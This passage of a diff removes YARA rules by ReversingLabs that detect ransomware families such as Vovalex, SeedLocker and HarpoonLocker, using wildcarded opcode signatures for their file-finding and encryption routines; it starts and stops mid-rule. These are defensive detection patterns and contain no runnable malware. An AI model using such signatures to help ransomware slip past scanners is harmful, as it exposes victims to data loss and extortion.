-            ?? 74 ?? 33 F6 85 FF 74 ?? 8B 44 24 ?? FF 34 B0 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 75 ?? 46 3B F7 72 ?? EB ?? FF B4 24 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 94 24 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 74 ?? FF B4 24 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 8B 74 24 ?? F6 44 24 ?? ?? 74 ?? F6 84 24 ?? ?? ?? ?? ?? 74
-            ?? 8D 44 24 ?? 50 8B D3 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 74 ?? 83 BC 24
-            ?? ?? ?? ?? ?? 74 ?? FF B4 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B
-            D6 FF B4 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ??
-            ?? FF B4 24 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? EB ?? 83 64 24 ?? ?? 55 FF 15 ?? ?? ?? ?? 5D 5F 5E 5B 81
-            C4 ?? ?? ?? ?? C3
-        }
-		$find_files_2 = {
-            81 EC ?? ?? ?? ?? 8D 44 24 ?? 53 55 56 68 ?? ?? ?? ?? 50 8B D9 FF 15 ?? ?? ?? ?? 8B
-            F0 85 F6 0F 84 ?? ?? ?? ?? 8D 6C 24 ?? 8D 6C 75 ?? 33 C0 66 89 44 74 ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 59 E8 ?? ?? ?? ?? 83 C0 ?? 6A ?? 59 66 89
-            45 ?? E8 ?? ?? ?? ?? 83 C0 ?? 66 89 44 74 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50
-            FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 84 C0 74 ?? 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 83 64 24 ?? ?? 8D 44
-            24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 53
-            FF 15 ?? ?? ?? ?? 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
-        }
-		$find_files_3 = {
-            81 EC ?? ?? ?? ?? 53 55 56 8B D9 57 8B FA 85 DB 74 ?? 33 D2 E8 ?? ?? ?? ?? 8B F0 85
-            F6 0F 84 ?? ?? ?? ?? 57 56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            83 C4 ?? 8B CE E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 C6 43 ?? ?? FF 15 ?? ?? ?? ??
-            0D ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? 0D ?? ?? ?? ?? 50 57 FF
-            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 0F
-            84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 80 7E ?? ?? 75 ?? 8B 15 ?? ?? ?? ?? 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 ?? ?? ?? ?? 83 64 24 ?? ?? 6A ?? FF 35 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 84 C0
-            0F 85 ?? ?? ?? ?? F7 44 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 56
-            57 FF 15 ?? ?? ?? ?? 50 8B D7 8B CB E8 ?? ?? ?? ?? 59 59 89 44 24 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? F6 44
-            24 ?? ?? 74 ?? 80 7E ?? ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 56 FF B4 24 ??
-            ?? ?? ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 59 59 EB ?? 80 7E ?? ?? 74 ?? 85 DB 74 ?? 83 7C
-            24 ?? ?? 7C ?? 7F ?? 81 7C 24 ?? ?? ?? ?? ?? 72 ?? 80 3E ?? 74 ?? 6A ?? 8D 44 24 ??
-            50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 44 24 ?? 50 FF 74 24 ?? FF 94 24 ?? ?? ?? ??
-            83 C4 ?? 85 C0 74 ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55
-            FF 15 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_* ) ) and ( all of ( $encrypt_files_* ) )
-}
-rule REVERSINGLABS_Win64_Ransomware_Vovalex : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Vovalex ransomware."
-		author = "ReversingLabs"
-		id = "dd4d7969-1afc-5e5d-9324-89f432523173"
-		date = "2021-03-12"
-		modified = "2021-03-12"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Vovalex.yara#L1-L81"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0c0f065224988bcba45b5aba2dceb080479b0bab235d544daabc3cae72e48318"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Vovalex"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$encrypt_files = {
-            48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ??
-            48 89 BD ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48
-            89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48
-            8B 9D ?? ?? ?? ?? 48 8B 53 ?? 48 8B 03 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48
-            8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 83 F8 ?? 75 ?? 48 8B B5 ??
-            ?? ?? ?? 48 8B 56 ?? 48 8B 06 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 95 ??
-            ?? ?? ?? 8B 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 9D ?? ?? ??
-            ?? 48 8B 53 ?? 48 8B 03 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
-            ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 48 83
-            EC ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 89 9D ?? ??
-            ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 89 85 ?? ?? ?? ?? 48 89 9D ?? ?? ?? ?? 48 8D 15 ??
-            ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ??
-            48 89 8D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 9D ?? ?? ?? ??
-            48 89 9D ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 0D
-            ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 85 ?? ?? ?? ?? 48 89 95 ??
-            ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 1D ??
-            ?? ?? ?? 48 89 9D ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 89 8D ??
-            ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? B9 ?? ?? ??
-            ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4
-        }
-		$find_files_p1 = {
-            48 89 C6 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83
-            EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 06 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC
-            ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89
-            46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89
-            C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ??
-            ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83
-            C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83
-            C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 8D
-            0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 C1 48 83 EC ?? E8 ?? ??
-            ?? ?? 48 83 C4 ?? 48 89 46 ?? 48 89 56 ?? 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 89 95 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48
-        }
-		$find_files_p2 = {
-            89 C3 48 8B 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 03 48 89 53 ?? 48 8D 15 ?? ??
-            ?? ?? BF ?? ?? ?? ?? 48 89 7B ?? 48 89 53 ?? 48 8D 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 48
-            89 43 ?? 48 89 4B ?? 48 89 9D ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 45 31 C0
-            4C 89 85 ?? ?? ?? ?? 4C 8D A5 ?? ?? ?? ?? 49 C7 04 24 ?? ?? ?? ?? 49 8B 14 24 48 89
-            95 ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D AD ?? ?? ?? ?? 49 B9 ?? ?? ?? ?? ?? ?? ??
-            ?? 4D 89 4D ?? 49 8B 4D ?? 48 89 8D ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D B5 ?? ??
-            ?? ?? 4D 89 06 49 8B 16 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ??
-            45 31 C0 41 3B C0 7E ?? 41 BF ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ??
-            4D 69 D7 ?? ?? ?? ?? 4D 89 11 4C 89 D2 48 8D 8D ?? ?? ?? ?? 48 83 EC ?? E8 ?? ?? ??
-            ?? 48 83 C4 ?? 45 31 C0 41 3B C0 79 ?? 4C 89 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48
-            C7 01 ?? ?? ?? ?? 48 8B 01 48 89 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 8D ?? ??
-            ?? ?? 48 83 EC ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 85 C0 7E ?? 48 8B 9D ?? ?? ?? ?? 48 B8
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 EB
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
-}
-rule REVERSINGLABS_Win64_Ransomware_Seedlocker : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects SeedLocker ransomware."
-		author = "ReversingLabs"
-		id = "efa3dd2e-faf4-5882-aef8-85189e65f0f9"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.SeedLocker.yara#L1-L91"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a478efcfb03e3eeebe72d9a71629456cf061c3c779fbdde99539854caf8c7c33"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "SeedLocker"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$search_files = {
-            48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B
-            05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 4C 8D 05 ?? ?? ?? ?? 4C 8B C9
-            BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8D ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
-            48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 44 24 ?? 4C 8B CF 4C 8D 05 ?? ?? ?? ?? 48 89 44 24
-            ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 48 8D 8D ??
-            ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ??
-            ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3
-            5D C3
-        }
-		$encrypt_files_p1 = {
-            FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 63 C8 48 8D 85 ?? ?? ??
-            ?? 48 8D 04 48 48 83 C0 ?? 66 83 38 ?? 75 ?? 45 33 FF 4C 8D 05 ?? ?? ?? ?? 66 44 89
-            38 45 33 C9 48 83 C0 ?? 4C 89 7C 24 ?? 48 89 05 ?? ?? ?? ?? 33 D2 48 8D 05 ?? ?? ??
-            ?? 44 89 7C 24 ?? 33 C9 48 89 05 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 D2 45 8D 47 ?? 33
-            C9 FF 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 48 8B 1D ?? ?? ?? ?? 48 81 C3 ?? ?? ??
-            ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D3 48 8B CE 44 8B F0 FF
-            15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8
-            FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 41 8D 46 ?? 48 63 C8 48 8D 1C 4B 66 44
-            39 3B 75 ?? 48 8B CE FF 15 ?? ?? ?? ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8B F8 48
-            83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 48 8B 1D ?? ?? ?? ?? 48 81
-            C3 ?? ?? ?? ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B D3 48 8D 4C 24 ?? 44 8B F0 FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? 44 8B 44 24 ?? 8D 48 ?? 33 D2 FF 15 ?? ?? ?? ?? 48 8B F0
-            48 83 F8 ?? 74 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 41 8D
-            46 ?? 48 63 C8 48 8D 1C 4B 66 44 39 3B 75 ?? 48 8D 54 24 ?? 48 8B CF FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 48 8B CF FF 15 ?? ?? ?? ?? 33 D2 48 8D 8D ?? ?? ?? ?? 41 B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 48 8D 35 ?? ?? ?? ?? 48
-        }
-		$encrypt_files_p2 = {
-            8D 8D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 4C 8B 05 ?? ?? ??
-            ?? 48 8D 8D ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 4C 89 BD
-            ?? ?? ?? ?? 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? ?? 33 D2 FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 48 8D 44 24 ?? 45
-            33 C9 45 33 C0 48 89 44 24 ?? 8D 53 ?? 33 C9 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
-            48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ??
-            ?? 3D ?? ?? ?? ?? 75 ?? 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ??
-            ?? 33 D2 FF 15 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 48 8B 0D
-            ?? ?? ?? ?? 41 8B DF 48 81 C1 ?? ?? ?? ?? 45 8B F7 FF 15 ?? ?? ?? ?? 85 C0 7E ?? 49
-            8B F7 48 8B 05 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F BE 8C 06 ?? ?? ??
-            ?? 44 0F BE 8C 06 ?? ?? ?? ?? 89 4C 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2
-            48 8D 8D ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 8B CB 48 8D 76 ?? FF C3 41 83 C6 ??
-            88 84 0D ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 44
-        }
-		$encrypt_files_p3 = {
-            3B F0 7C ?? 48 8D 35 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 48 8D
-            95 ?? ?? ?? ?? 44 8B C3 44 89 7C 24 ?? 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 4C 8B C3 E8 ??
-            ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 C7 44 24 ?? ?? ?? ?? ??
-            48 89 44 24 ?? 33 D2 48 8D 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 48 89 44 24 ?? 45 8D 41
-            ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 41 8B DF 44 39 BD ?? ?? ?? ?? 76 ?? 8B C3 4C 8D 05
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 44 0F B6 8C 05 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF C3 3B 9D ?? ??
-            ?? ?? 72 ?? 48 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 D2 48 8B CF FF 15 ?? ?? ?? ??
-            48 8B 05 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 83 C0 ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 89 44 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 06 00 48
-            8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 66 44 89 BD ?? ?? 00 00 F3 0F 7F 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8D 8D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 48 8B 8D ?? ?? ?? ??
-            48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ??
-            49 8B E3 41 5F 41 5E 5D C3
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and $search_files and ( all of ( $encrypt_files_p* ) )
-}
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Harpoonlocker : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects HarpoonLocker ransomware."
-		author = "ReversingLabs"
-		id = "3605d354-5a33-54b1-83ad-ad514c78357b"
-		date = "2022-01-27"
-		modified = "2022-01-27"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.HarpoonLocker.yara#L1-L96"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "20587f9dce5981934498d9979843a090224ba649def8b694adf7799b7060cc25"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HarpoonLocker"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$encrypt_files_p1 = {
-            7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 14 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 6F
-            ?? ?? ?? ?? 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 73 ?? ?? ?? ?? 25 06 07 9A 7D
-            ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? ?? 26 07 17 58 0B 07 06 8E
-            69 32 ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 73 ?? ?? ?? ?? 0D
-            09 12 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ??
-            ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 12 ??
-            12 ?? 28 ?? ?? ?? ?? 12 ?? 12 ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 59 13 ?? 72 ?? ?? ?? ?? 11
-            ?? 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 2C ?? 20 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 2B ?? 2A
-        }
-		$encrypt_files_p2 = {
-            12 ?? FE 15 ?? ?? ?? ?? 12 ?? FE 15 ?? ?? ?? ?? 12 ?? FE 15 ?? ?? ?? ?? 02 16 12 ?? 28
-            ?? ?? ?? ?? 26 08 7B ?? ?? ?? ?? 0D 08 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 35 ?? 08 7B ?? ??
-            ?? ?? 16 36 ?? DD ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 10 ?? 03 03 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
-            13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 03 6F ?? ?? ?? ?? 16 11 ?? 16 1F ?? 28 ?? ?? ?? ?? 03
-            6F ?? ?? ?? ?? 16 11 ?? 1F ?? 1F ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 1F ?? 6A
-            13 ?? 17 13 ?? 09 6E 13 ?? 2B ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 59 13 ?? 11 ?? 11 ?? 30
-            ?? 02 19 17 7E ?? ?? ?? ?? 19 20 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ??
-            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? 11 ?? 7E ?? ?? ?? ?? 1A 16 09 20 ??
-            ?? ?? ?? 58 14 28 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ??
-            06 1F ?? 16 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ??
-            DD ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 26 16 13 ?? 16 13 ?? 2B ?? 11 ?? 20 ?? ?? ?? ?? 2F
-            ?? 09 6E 11 ?? 6A 59 13 ?? 11 ?? D4 8D ?? ?? ?? ?? 13 ?? 11 ?? 17 58 11 ?? 33 ?? 11 ??
-            D4 8D ?? ?? ?? ?? 13 ?? 07 11 ?? 28 ?? ?? ?? ?? 11 ?? 16 11 ?? 8E 69 28 ?? ?? ?? ?? 11
-            ?? 18 5D 2D ?? 11 ?? 8E 69 1F ?? 33 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 07 11
